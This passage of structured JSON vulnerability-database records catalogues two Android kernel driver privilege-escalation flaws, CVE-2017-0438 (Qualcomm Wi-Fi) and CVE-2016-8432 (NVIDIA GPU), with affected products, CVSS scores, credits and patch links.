      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201702-0753",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "android",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "android",
        "scope": null,
        "trust": 0.8,
        "vendor": "google",
        "version": null
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "android",
        "version": "0"
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5x"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01582"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001487"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0438"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-296"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:google:android:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "7.1.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0438"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Hao Chen and Guang Gong of Alpha Team, Qihoo 360 Technology Co. Ltd",
    "sources": [
      {
        "db": "BID",
        "id": "96047"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2017-0438",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.6,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-0438",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "id": "CNVD-2017-01582",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.0,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-0438",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-0438",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-01582",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201702-296",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-0438",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01582"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0438"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001487"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0438"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-296"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-32402604. References: QC-CR#1092497. GoogleNexus/Pixel is a Google smartphone from the United States. Google Nexus/ Pixel products are prone to multiple privilege-escalation vulnerabilities. \nThese issues are being tracked by Android Bug IDs A-32402310, A-32402604, A-32450647, A-32454494, A-32451171, A-32451104, A-33252788, A-32872662, A-32871330, A-32877494 and A-32879283",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0438"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001487"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01582"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0438"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-0438",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "96047",
        "trust": 2.6
      },
      {
        "db": "SECTRACK",
        "id": "1037798",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001487",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01582",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-296",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0438",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01582"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0438"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001487"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0438"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-296"
      }
    ]
  },
  "id": "VAR-201702-0753",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01582"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01582"
      }
    ]
  },
  "last_update_date": "2023-12-18T11:06:36.796000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-February 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for QualcommWi-FiDriver Privilege Escalation Vulnerability (CNVD-2017-01582) for GoogleNexus/Pixel Products",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/89412"
      },
      {
        "title": "Android Qualcomm Wi-Fi Fixes for driver permission and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67580"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014February 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=861656f01e3e18209f39ad844e9ee35d"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01582"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0438"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001487"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-296"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-120",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001487"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0438"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/96047"
      },
      {
        "trust": 2.1,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1037798"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-0438"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-0438"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/120.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01582"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0438"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001487"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0438"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-296"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01582"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0438"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001487"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0438"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-296"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01582"
      },
      {
        "date": "2017-02-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0438"
      },
      {
        "date": "2017-02-07T00:00:00",
        "db": "BID",
        "id": "96047"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001487"
      },
      {
        "date": "2017-02-08T15:59:01.613000",
        "db": "NVD",
        "id": "CVE-2017-0438"
      },
      {
        "date": "2017-02-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-296"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01582"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0438"
      },
      {
        "date": "2017-03-07T00:02:00",
        "db": "BID",
        "id": "96047"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001487"
      },
      {
        "date": "2019-10-03T00:03:26.223000",
        "db": "NVD",
        "id": "CVE-2017-0438"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-296"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-296"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Qualcomm Wi-Fi Vulnerability that could elevate privileges in drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001487"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-296"
      }
    ],
    "trust": 0.6
  }
}

var-201701-0103
Vulnerability from variot

An elevation of privilege vulnerability in the NVIDIA GPU driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: Kernel-3.18. Android ID: A-32447738. References: N-CVE-2016-8432. GooglePixelC is a tablet from Google Inc. in the United States. Google Nexus is prone to multiple privilege-escalation vulnerabilities. These issues are being tracked by Android Bug IDs A-32402179 and A-32447738

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201701-0103",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel c",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00175"
      },
      {
        "db": "BID",
        "id": "95236"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006804"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8432"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-052"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8432"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Yuan-Tsung Lo, Tong Lin, Chiachih Wu and Xuxian Jiang of C0RE Team.",
    "sources": [
      {
        "db": "BID",
        "id": "95236"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-052"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2016-8432",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.6,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 9.3,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2016-8432",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-00175",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-8432",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-8432",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-00175",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201701-052",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-8432",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00175"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8432"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006804"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8432"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-052"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the NVIDIA GPU driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: Kernel-3.18. Android ID: A-32447738. References: N-CVE-2016-8432. GooglePixelC is a tablet from Google Inc. in the United States. Google Nexus is prone to multiple privilege-escalation vulnerabilities. \nThese issues are being tracked by Android Bug IDs A-32402179  and A-32447738",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8432"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006804"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00175"
      },
      {
        "db": "BID",
        "id": "95236"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8432"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-8432",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "95236",
        "trust": 2.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006804",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00175",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-052",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8432",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00175"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8432"
      },
      {
        "db": "BID",
        "id": "95236"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006804"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8432"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-052"
      }
    ]
  },
  "id": "VAR-201701-0103",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00175"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00175"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:05:08.673000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
